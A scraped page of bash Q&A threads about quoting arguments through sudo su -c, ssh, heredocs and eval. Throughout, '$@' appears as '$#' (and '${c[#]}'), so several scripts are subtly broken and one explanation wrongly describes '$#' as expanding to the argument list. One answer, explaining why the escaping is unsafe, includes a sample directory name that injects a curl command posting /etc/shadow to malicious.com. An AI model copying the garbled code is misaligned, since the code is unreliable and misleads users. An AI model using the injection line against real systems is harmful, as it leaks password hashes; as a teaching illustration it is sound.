bash parameter variables in script problem - bash

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su which goes to root with no password. But if I put paramaters, the $c variable equals "-c", which makes su execute a single command.
It works good, except for when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $# ?

Ah, fun with quoting. Usually, the approach #John suggests will work for this: use "$#", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work because su's -c option expects the entire command to be passed as a single parameter, and then it'll start a new shell which parses the command (including getting confused by spaces and such). In order to avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
sudo su -c "$(printf "%q " "$#")"
else
sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf "%q " "$#" command in the script, it replaces "$#" with the arguments to the script, with parameter breaks intact. It's equivalent to printf "%q " "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?

"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su except a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right, which sidesteps the double quoting issues. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. In case your script has no argument , you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$#"; fi
exec sudo "$#"
(The else part is to handle the rare case of a command that begins with -.)
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.

Related

What does $"${#// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${#// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${#/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$#"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$#"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${#// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid#server ls /tmp
And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.

How to handle shell script arguments in heredoc?

I need to switch to oracle user to change permissions to tnsnames.ora file. I am passing this file path as argument but looks like somewhere the syntax is wrong. Appreciate help in fixing this issue.
Belows is the peice of my script.
#!/bin/bash
sudo su - oracle <<-"EOF"
chmod 777 "$1"
EOF
It is failing by giving the following error:
/home/itsh->./dothis.sh /home/oracle/orasys/11.2.0.2/network/admin/tnsnames.ora
chmod: cannot access `': No such file or directory
If you're in any way concerned about security, the right thing to do is not to change your quoting, but to keep it as it is and use bash -s to pass your arguments to the shell running as the oracle user directly:
#!/bin/bash
sudo -u oracle bash -s "$#" <<-'EOF'
chmod 777 "$1"
EOF
...or, if you must use sudo su - oracle (which I'd argue is bad practice, and best avoided):
#!/bin/bash
printf -v sudo_cmd '%q ' bash -s "$#"
sudo su - oracle -c "$sudo_cmd" <<-'EOF'
chmod 777 "$1"
EOF
With either of these practices, your inner shell runs the $1 expansion itself -- and the data on the command line isn't substituted into, and parsed as, code.
The operation of a here document is specified in the POSIX spec where it says:
If any character in word is quoted, the delimiter shall be formed by performing quote removal on word, and the here-document lines shall not be expanded. Otherwise, the delimiter shall be the word itself.
If no characters in word are quoted, all lines of the here-document shall be expanded for parameter expansion, command substitution, and arithmetic expansion. In this case, the <backslash> in the input behaves as the <backslash> inside double-quotes (see Double-Quotes). However, the double-quote character ( '"' ) shall not be treated specially within a here-document, except when the double-quote appears within "$()", "``", or "${}".
So by using <<-"EOF" (instead of <<-EOF) as your here document marker you are explicitly telling the shell not to expand any variables (from the shell context) in the here document contents.
This is often what you want when you are using a heredoc for a shell snippet but in your case this is exactly the opposite of what you appear to be looking for.

use argument containing spaces in bash

I know about escaping, quoting and stuff, but still have a problem.
I you have a script containing "cd $1", and call it with an argument containing spaces, cd will always return an error message - it stops at the first space and can't find the directory. I tried protecting the arguments in every way :
ls -l
+-rwx... script
+drwx... dir with spaces/
cat script
+cd $1
script dir with spaces
+cd: dir: no such file or directory
script "dir with spaces"
+cd: dir: no such file or directory
script dir\ with\ spaces
+cd: dir\: no such file or directory
but none will work.
I feel like I'm missing the obvious, thanks for enlightening me.
You need to quote the expansion of "$1" to prevent it from being word split as well as quoting the string passed to the script to prevent it from being word-split.
So
$ cat script.sh
cd -- "$1"
$ ./script.sh "dir with spaces"
Edit: As gniourf_gniourf correctly pointed out using -- as the first argument to cd prevents problems should paths ever start with -.
Use double quotes on the variable
cd "$1"

Why doesn't zsh syntax work in this script?

I'm just trying to understand what is happening here, so that I understand how to parse strings in shell scripts better.
I know that usually, when you try to pass a string of arguments separated by spaces directly to a command, they will be treated as a single string argument and therefore not recognized:
>check="FileA.txt FileB.txt"
>ls $check
ls: cannot access FileA.txt FileB.txt: No such file or directory
However, in this script two arguments are taken each as space separated strings. In this case, both strings are recognizes as lists of arguments that can be passed to different commands:
testscript.sh
while getopts o:p: arguments
do
case $arguments in
o) olist="$OPTARG";;
p) plist=$OPTARG;;
esac
done
echo "olist"
ls -l $olist
echo "plist"
ls -l $plist
the output is then as follows:
>testscript.sh -o "fileA.txt fileB.txt" -p "file1.txt file2.txt"
Olist
fileA.txt
fileB.txt
plist
file1.txt
file2.txt
What is different here? Why are the space separated strings suddenly recognized as lists?
Your script does not start with a #!-line and does therefore not specify an interpreter. In that case the default is used, which is /bin/sh and not your login shell or the shell you are starting the script from (unless that is /bin/sh of course). Chances are good that /bin/sh is not a zsh, as most distributions and Unices seem to use sh, bash, dash or ksh as default shell. All of which handle parameter expansion such that strings are handles as lists if the parameter was not quoted with double-quotes.
If you want to use zsh as interpreter for your scripts, you have to specify it in the first line of the script:
#!/usr/bin/zsh
Modify the path to wherever your zsh resides.
You can also use env as a wrapper:
#!/usr/bin/env zsh
This makes you more independent of the actual location of zsh, it just has to be in $PATH.
As a matter of fact (using bash)...
sh$ check="FileA.txt FileB.txt"
sh$ ls $check
ls: cannot access FileA.txt: No such file or directory
ls: cannot access FileB.txt: No such file or directory
When you write $check without quotes, the variable is substituted by its content. Insides paces (or to be precises inside occurrences of IFS) are considered as field separators. Just as you where expecting it first.
The only way I know to reproduce your behavior is to set IFS to something else than its default value:
sh$ export IFS="-"
sh$ check="FileA.txt FileB.txt"
sh$ ls $check
ls: cannot access FileA.txt FileB.txt: No such file or directory

Bash eval replacement $() not always equivalent?

Everybody says eval is evil, and you should use $() as a replacement. But I've run into a situation where the unquoting isn't handled the same inside $().
Background is that I've been burned too often by file paths with spaces in them, and so like to quote all such paths. More paranoia about wanting to know where all my executables are coming from. Even more paranoid, not trusting myself, and so like being able to display the created commands I'm about to run.
Below I try variations on using eval vs. $(), and whether the command name is quoted (cuz it could contain spaces)
BIN_LS="/bin/ls"
thefile="arf"
thecmd="\"${BIN_LS}\" -ld -- \"${thefile}\""
echo -e "\n Running command '${thecmd}'"
$($thecmd)
Running command '"/bin/ls" -ld -- "arf"'
./foo.sh: line 8: "/bin/ls": No such file or directory
echo -e "\n Eval'ing command '${thecmd}'"
eval $thecmd
Eval'ing command '"/bin/ls" -ld -- "arf"'
/bin/ls: cannot access arf: No such file or directory
thecmd="${BIN_LS} -ld -- \"${thefile}\""
echo -e "\n Running command '${thecmd}'"
$($thecmd)
Running command '/bin/ls -ld -- "arf"'
/bin/ls: cannot access "arf": No such file or directory
echo -e "\n Eval'ing command '${thecmd}'"
eval $thecmd
Eval'ing command '/bin/ls -ld -- "arf"'
/bin/ls: cannot access arf: No such file or directory
$("/bin/ls" -ld -- "${thefile}")
/bin/ls: cannot access arf: No such file or directory
So... this is confusing. A quoted command path is valid everywhere except inside a $() construct? A shorter, more direct example:
$ c="\"/bin/ls\" arf"
$ $($c)
-bash: "/bin/ls": No such file or directory
$ eval $c
/bin/ls: cannot access arf: No such file or directory
$ $("/bin/ls" arf)
/bin/ls: cannot access arf: No such file or directory
$ "/bin/ls" arf
/bin/ls: cannot access arf: No such file or directory
How does one explain the simple $($c) case?
The use of " to quote words is part of your interaction with Bash. When you type
$ "/bin/ls" arf
at the prompt, or in a script, you're telling Bash that the command consists of the words /bin/ls and arf, and the double-quotes are really emphasizing that /bin/ls is a single word.
When you type
$ eval '"/bin/ls" arf'
you're telling Bash that the command consists of the words eval and "/bin/ls" arf. Since the purpose of eval is to pretend that its argument is an actual human-input command, this is equivalent to running
$ "/bin/ls" arf
and the " gets processed just like at the prompt.
Note that this pretense is specific to eval; Bash doesn't usually go out of its way to pretend that something was an actual human-typed command.
When you type
$ c='"/bin/ls" arf'
$ $c
the $c gets substituted, and then undergoes word splitting (see §3.5.7 "Word Splitting" in the Bash Reference Manual), so the words of the command are "/bin/ls" (note the double-quotes!) and arf. Needless to say, this doesn't work. (It's also not very safe, since in addition to word-splitting, $c also undergoes filename-expansion and whatnot. Generally your parameter-expansions should always be in double-quotes, and if they can't be, then you should rewrite your code so they can be. Unquoted parameter-expansions are asking for trouble.)
When you type
$ c='"/bin/ls" arf'
$ $($c)
this is the same as before, except that now you're also trying to use the output of the nonworking command as a new command. Needless to say, that doesn't cause the nonworking command to suddenly work.
As Ignacio Vazquez-Abrams says in his answer, the right solution is to use an array, and handle the quoting properly:
$ c=("/bin/ls" arf)
$ "${c[#]}"
which sets c to an array with two elements, /bin/ls and arf, and uses those two elements as the word of a command.
With the fact that it doesn't make sense in the first place. Use an array instead.
$ c=("/bin/ls" arf)
$ "${c[#]}"
/bin/ls: cannot access arf: No such file or directory
From the man page for bash, regarding eval:
eval [arg ...]:
The args are read and concatenated together into a single command.
This command is then read and executed by the shell, and its exit
status is returned as the value of eval.
When c is defined as "\"/bin/ls\" arf", the outer quotes will cause the entire thing to be processed as the first argument to eval, which is expected to be a command or program. You need to pass your eval arguments in such a way that the target command and its arguments are listed separately.
The $(...) construct behaves differently than eval because it is not a command that takes arguments. It can process the entire command at once instead of processing arguments one at a time.
A note on your original premise: The main reason that people say that eval is evil was because it is commonly used by scripts to execute a user-provided string as a shell command. While handy at times, this is a major security problem (there's typically no practical way to safety-check the string before executing it). The security problem doesn't apply if you are using eval on hard-coded strings inside your script, as you are doing. However, it's typically easier and cleaner to use $(...) or `...` inside of scripts for command substitution, leaving no real use case left for eval.
Using set -vx helps us understand how bash process the command string.
As seen in the picture, "command" works cause quotes will be stripped when processing. However, when $c(quoted twice) is used, only the outside single quotes are removed. eval can process the string as the argument and outside quotes are removed step by step.
It is probably just related to how bash semanticallly process the string and quotes.
Bash does have many weird behaviours about quotes processing:
Bash inserting quotes into string before execution
How do you stop bash from stripping quotes when running a variable as a command?
Bash stripping quotes - how to preserve quotes

Resources